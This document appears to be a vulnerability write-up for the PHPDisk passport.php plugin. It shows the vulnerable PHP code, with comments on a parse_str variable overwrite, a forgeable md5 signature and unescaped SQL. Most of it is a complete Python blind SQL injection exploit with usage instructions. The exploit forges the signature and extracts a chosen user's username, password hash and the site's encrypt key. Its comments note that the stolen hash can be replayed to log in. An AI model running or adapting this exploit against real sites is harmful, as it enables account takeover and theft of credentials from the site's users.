文件 plugins\phpdisk_client\passport.php
// Review notes: every value this fragment works with comes from the request.
// QUERY_STRING is the raw, undecoded query part of the URL, fully under the
// caller's control.
$str = $_SERVER['QUERY_STRING'];
if($str){
    // Trigger point. parse_str() with no second argument writes every key of
    // the decoded string into the current scope as a PHP variable, so one
    // request can define or overwrite any variable this file uses afterwards
    // (e.g. $tpf, the table prefix interpolated unquoted into the SQL that
    // follows). Fix: parse_str(base64_decode($str), $params) and read only
    // the expected keys out of $params.
    parse_str(base64_decode($str));
}else{
    exit('Error Param');
}
/*$username = trim(gpc('username','G',''));
$password = trim(gpc('password','G',''));
$sign = trim(gpc('sign','G',''));*/
// Signature check. $sign, $action, $username and $password all come from the
// same attacker-controlled string decoded above, and no server-side secret is
// mixed into the hash, so any client can compute a valid $sign for any values.
// This guards against accidental corruption, not forgery; a real fix must key
// the hash with a secret the client does not have (HMAC).
if($sign!=strtoupper(md5($action.$username.$password))){
    exit('No data,Code:2!');
}
// Charset conversion only -- nothing escapes $username (or $password) before
// they are interpolated into the SQL below. Which direction convert_str()
// converts is not visible in this fragment.
$username = is_utf8() ? convert_str('gbk','utf-8',$username) : $username;
- if($action=='passportlogin'){
- $rs = $db->fetch_one_array("select userid,gid,username,password,email from {$tpf}users where username='$username' and password='$password' limit 1"); //覆盖tpf
phpdisk.py exploit:
- #===============================================================================
- # Id :phpdisk.py
- # Author:Yaseng
- #===============================================================================
- import sys, urllib2, time, os , Queue, msvcrt, threading,re,base64,md5,hashlib,binascii,cookielib
-
def cslogo():
    """Print the tool banner and usage line to stdout.

    The banner is a raw string: it contains backslashes that are not valid
    escape sequences, so r''' keeps the art byte-for-byte without warnings.
    """
    banner = r'''
 ___ ___ ____ ____ ____ __ __ _ _
/ __)/ _ \( _ \( ___)( _ \( ) /__\ ( \/ )
( (__( (_) ))(_) ))__) )___/ )(__ /(__)\ \ /
\___)\___/(____/(____)(__) (____)(__)(__)(__)
Name:phpdisk bind sql injection exploit
Author:Yaseng [yaseng@uauc.net]
Usage:phpdisk.py site[www.yaseng.me] id[1]
'''
    print(banner)
-
- # show message
def msg(text, type=0):
    """Print *text* with a status prefix.

    type 0 -> "[*]" (info), 1 -> "[+]" (success), anything else -> "[-]".
    The parameter name shadows the builtin ``type``; it is kept because it
    is part of the call signature.
    """
    prefix = "[*]" if type == 0 else "[+]" if type == 1 else "[-]"
    print(prefix + text)
-
- # get url data
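def get_data(url):
    """GET *url* and return the response body, or 0 on any transport failure.

    Returns 0 (not None, not an exception) because callers test the result
    for truthiness and use it as a string; a 0 means "no response" and must
    be checked before calling string methods on it. The 10 s timeout bounds
    each blind-injection probe.

    Only Exception subclasses are swallowed: the original bare ``except:``
    also ate KeyboardInterrupt, which made the per-character probe loops
    impossible to abort with Ctrl-C. The response is closed explicitly
    because the extraction loops open hundreds of connections.
    """
    try:
        r = urllib2.urlopen(url, timeout=10)
    except Exception:
        return 0
    try:
        return r.read()
    except Exception:
        return 0
    finally:
        r.close()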
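def b(url):
    """Boolean oracle for one blind-injection probe.

    Returns 1 when the page does NOT contain "ssport Err" (the injected
    condition held, so passport.php's query still returned a user row) and
    0 when it does (no row; the page presumably prints a "Passport Error"
    message).

    A failed request (get_data() returns 0) is reported as 0, i.e. "false".
    The original called .find() on that 0 and crashed with AttributeError
    mid-extraction. Consequence to keep in mind: while the target is
    unreachable every probe reads "false" and a position may be skipped,
    so reachability should be confirmed first (as __main__ does with
    get_data(target)).
    """
    body = get_data(url)
    if not body:
        return 0
    return 0 if "ssport Err" in body else 1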
-
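def make_plyload(payload, username="1", password="1", action="passportlogin"):
    """Build the probe URL for passport.php with *payload* injected via ``tpf``.

    passport.php feeds base64_decode(QUERY_STRING) to parse_str() with no
    target array, so every key in this query string becomes a PHP variable
    on the server -- including ``tpf``, the table prefix interpolated into
    its SQL. The ``sign`` it then verifies is md5(action . username . password)
    upper-cased; every input to that hash is chosen here, so the check is
    satisfied rather than bypassed.

    Args:
        payload: text substituted for the table prefix (the injection).
        username, password, action: the other request fields; defaults
            reproduce the original hard-coded values.

    Reads the module global ``target`` (set in __main__). Uses hashlib,
    already imported, instead of the long-deprecated ``md5`` module.
    """
    sign = hashlib.md5((action + username + password).encode("utf-8")).hexdigest().upper()
    query = "username=%s&password=%s&action=%s&tpf=%s&sign=%s" % (
        username, password, action, payload, sign)
    return target + "?" + base64.b64encode(query.encode("utf-8")).decode("ascii")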
-
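def get_username(max_len=40):
    """Extract the username of user ``uid`` one character at a time.

    Two blind-injection phases, each decided by b(): first LENGTH() of the
    username (probed 1..max_len-1), then every character by substr()
    equality. Candidates are sent as hex literals (0x..), which MySQL
    treats as binary strings, so the comparison is byte-wise and
    case-sensitive -- upper-case letters and a few common punctuation
    characters are therefore probed as well (the original list was digits
    and lower-case only and silently skipped any other position).

    A position with no matching candidate is reported via msg(type=2) and
    left out, so the result is then shorter than the probed length.
    Reads the module global ``uid``; assigns the module global ``key_list``
    as the original did.
    """
    msg("get username ...")
    length = 0
    for i in range(1, max_len):
        if b(make_plyload("pd_users WHERE 1 and (SELECT LENGTH(username) from pd_users where userid=%d )= %d #" % (uid, i))):
            length = i
            msg("username length:%d" % length, 1)
            break
    if length == 0:
        msg("username length not found (longer than %d, or oracle not working)" % (max_len - 1), 2)
    global key_list
    key_list = (list("0123456789")
                + [chr(c) for c in range(97, 123)]
                + [chr(c) for c in range(65, 91)]
                + ["_", ".", "-", "@"])
    chars = []
    for pos in range(1, length + 1):
        for key in key_list:
            literal = "0x%02x" % ord(key)  # same hex literal binascii produced
            if b(make_plyload(" pd_users WHERE 1 and (SELECT substr(username,%d,1) from pd_users where userid=%d )=%s #" % (pos, uid, literal))):
                msg("username [%d]:%s" % (pos, key))
                chars.append(key)
                break
        else:
            msg("username [%d]: no candidate matched, position skipped" % pos, 2)
    username = "".join(chars)
    msg("username:" + username, 1)
    return username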
-
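def get_password():
    """Extract the 32-character stored password value of user ``uid``.

    Candidates are the 16 hex digits only: the PHP listing's login query
    compares the request's password directly against the stored column,
    and __main__ treats a 32-char result as success, so the stored value is
    presumably an md5 hex digest. That also means the extracted value can
    be replayed as-is through the passport login; no cracking is needed.

    Fixes the original's final log line, which labelled the result
    "username:". A position with no match is reported via msg(type=2) and
    skipped, which leaves the result shorter than 32 and lets __main__'s
    length check fail instead of announcing a truncated value as success.
    """
    msg("get password ...")
    hex_digits = "0123456789abcdef"
    chars = []
    for pos in range(1, 33):
        for key in hex_digits:
            literal = "0x%02x" % ord(key)  # same hex literal binascii produced
            if b(make_plyload(" pd_users WHERE 1 and (SELECT substr(password,%d,1) from pd_users where userid=%d )= %s #" % (pos, uid, literal))):
                msg("password [%d]:%s" % (pos, key))
                chars.append(key)
                break
        else:
            msg("password [%d]: no candidate matched, position skipped" % pos, 2)
    password = "".join(chars)
    msg("password:" + password, 1)
    return password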
-
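def get_encrypt_key(max_len=40):
    """Extract the value of pd_settings.vars = 'encrypt_key' via the same
    boolean oracle (0x656e63727970745f6b6579 is that name hex-encoded).

    Not called from __main__; kept as a helper. Unlike get_username(), the
    character probe wraps substr() in binary() and the candidate list has
    both letter cases. The trailing "#23" in the length probe is only a SQL
    line comment; the "23" is inert.

    Assigns the module globals ``pass_list`` and ``key_list`` as the
    original did (nothing in this listing reads them). A position with no
    matching candidate is reported via msg(type=2) and skipped.
    """
    msg("get encrypt_key ...")
    global pass_list
    pass_list = [chr(c) for c in range(97, 123)]
    length = 0
    for i in range(1, max_len):
        if b(make_plyload("pd_users WHERE 1 and ( SELECT LENGTH(value) from pd_settings where vars=0x656e63727970745f6b6579 )=%d #23" % i)):
            length = i
            msg("encrypt_key length:%d" % length, 1)
            break
    if length == 0:
        msg("encrypt_key length not found (longer than %d, or oracle not working)" % (max_len - 1), 2)
    global key_list
    key_list = (list("0123456789")
                + [chr(c) for c in range(65, 91)]
                + [chr(c) for c in range(97, 123)])
    chars = []
    for pos in range(1, length + 1):
        for key in key_list:
            literal = "0x%02x" % ord(key)  # same hex literal binascii produced
            if b(make_plyload(" pd_users WHERE 1 and ( SELECT binary(substr(value,%d,1)) from pd_settings where vars=0x656e63727970745f6b6579 ) = %s #" % (pos, literal))):
                msg("key [%d]:%s" % (pos, key))
                chars.append(key)
                break
        else:
            msg("key [%d]: no candidate matched, position skipped" % pos, 2)
    encrypt_key = "".join(chars)
    msg("encrypt_key:" + encrypt_key, 1)
    return encrypt_key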
-
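if __name__ == '__main__':

    cslogo()
    if not sys.argv[1:]:
        # The banner already shows usage; the original fell through silently.
        sys.exit(1)
    site = sys.argv[1].rstrip("/")
    # uid: numeric userid to extract; defaults to 1 when absent or not an
    # integer, as before (but without a bare except).
    try:
        uid = int(sys.argv[2])
    except (IndexError, ValueError):
        uid = 1
    # Usage shows a bare host, but urllib2 needs a scheme; without one it
    # raised ValueError inside get_data() and the run was misreported as
    # "vulnerability not exits". Add http:// only when none is given.
    if "://" not in site:
        site = "http://" + site
    target = site + "/plugins/phpdisk_client/passport.php"
    msg("exploit:" + site)
    if not get_data(target):
        # No response is a transport failure, not evidence the target is
        # patched -- say so instead of the original "vulnerability not exits".
        msg("no response from %s; cannot test" % target, 2)
        sys.exit(1)
    username = get_username()
    if username:
        password = get_password()
        if len(password) == 32:
            msg("Succeed: username:%s password:%s" % (username, password), 1)
        else:
            msg("password extraction incomplete (%d of 32 chars)" % len(password), 2)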
作者:yaseng